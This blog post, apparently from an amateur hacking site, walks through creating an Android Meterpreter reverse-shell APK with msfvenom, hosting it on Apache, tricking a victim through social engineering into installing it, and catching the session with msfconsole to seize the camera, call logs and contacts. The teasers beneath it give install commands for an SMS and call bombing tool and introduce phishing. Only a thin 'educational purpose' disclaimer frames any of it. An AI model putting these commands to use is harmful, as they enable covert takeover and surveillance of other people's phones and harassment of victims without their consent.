How to create a payload and access Android?

-

Try at your own risk.

Only for educational purpose.

First let us get the basics clear...

 

What is Payload?

In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload.

What we will do?

We will access the android device by creating a payload.  

What we will get?

We will get the full control of the android device for ex camera snapshots, call logs, contact logs, apps installed in phone, system info etc.

How we will do this?

 

 

 With the help of Metasploit we will create an apk file ie.payload. Then we will send this apk file to target target device. After installing the file on target device we will get full control of the device.

Lets Start...

We will use Kali Linux for this purpose. 

First create a payload


root@kali :~# msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=5555 R > filename.apk

# mv (filename.apk) /var/www/html/

# cd /var/www/html/

Now you need to check for the status of apache server and start it.

Use these commands:

# sudo service apache2 status
# sudo service apache2 start

Now here is the time to show some social engineering skills...

Send this link format to the device and ask user to install it. Now how you do that its upon you.

(ip address)/filename.apk


NOW Enter Following Commands:

root@kali :~ # msfconsole
root@kali :~ # use multi/handler
root@kali :~ # set PAYLOAD android/meterpreter/reverse_tcp
root@kali :~ # set LHOST (your ip)
root@kali :~ # set LPORT 5555
root@kali :~ # exploit

 

And that's it!

When user installs app on device and clicks on it you will get access to device.  

 

Stay Secure From Digital Threats

 


Comments

Post a Comment

Popular posts from this blog

T Bomb: SMS and Call Bomber! Hangs Your Smartphone!

-
Image
Discovering a tool which has capibility to hang your smartphone! T Bomb is an open source call and SMS bomber for Linux and Termux. T Bomb can send unlimited sms and calls on victim's phone so that the hang can get hang.  Installation Step 1. Type command  pkg install git Step 2. pkg install python Step 3. git clone https://github.com/TheSpeedX/TBomb.git Step 4. cd TBomb Step 5. chmod +x TBomb.sh  Now run the tool Step 6. cd TBomb Step 7. ./TBomb.sh And Boom!!! Now perform as per instructed. Press Enter Press 1 for SMS bomber Press 2 for Call bomber Press 3 To  Update (Works On Linux And Linux Emulators) Press 4 To  View Features Press 5 To  Exit Important: Only For Educational Purpose. We are not responsible if any kind of misuse of this tool is identified.
Read more

Phishing: A sweet poison!

-
Image
Phishing  is a fradulent attempt to obtain sensitive information such as passwords, usernames, credit card details by disguising oneself as a trustworthy entity in an electronic communication. This is how Phishing is defined.Got It? No. That's ok. You will get it by the end of this blog. Hackers are creative and they should be!  One such famous hacking technique or a way to gain information of target user is is called Phishing. Phising is method to gather personal information using mainly deceptive emails and websites. The goal is to make the target believe that the message,mail or website is something important for him for example a bank request,donation and to force him to click the link. It is one of the oldest type of cyberattacks dating back to 1990's and still one of the most popular attack between hackers. How Phishing got its name? Yes you guessed it right. Phishing is similar to word Fishing. The letter "f" is replaced by "p". As in fishing, the fis
Read more

Stay Secure Always!

-
Image
Stay Secure Always! We are living in 21st century. This era is what we can call it as an "Digital Era". The world is becoming digital day by day. Use of Smartphones, digital payments, and services based on internet are increasing. We can't imagine a single day without Internet today.It has made over life so easy. But as a coin has two sides, internet also has its evil side. Today "Data" is the currency. Data or we can say meaningful information is what matters the most. If you have data and you know how to use it, you can acquire the world. But if someone misused data it can also lead to death. So one should have knowledge about how to stay secure online. One should be aware of all the Digital Threats. So here are we....... Through InfoSec Hub you will be able to get knowledge about How to protect our data Kali Linux O.S. Hacking  Various attacks Various Tools And much more....So stay tuned.....
Read more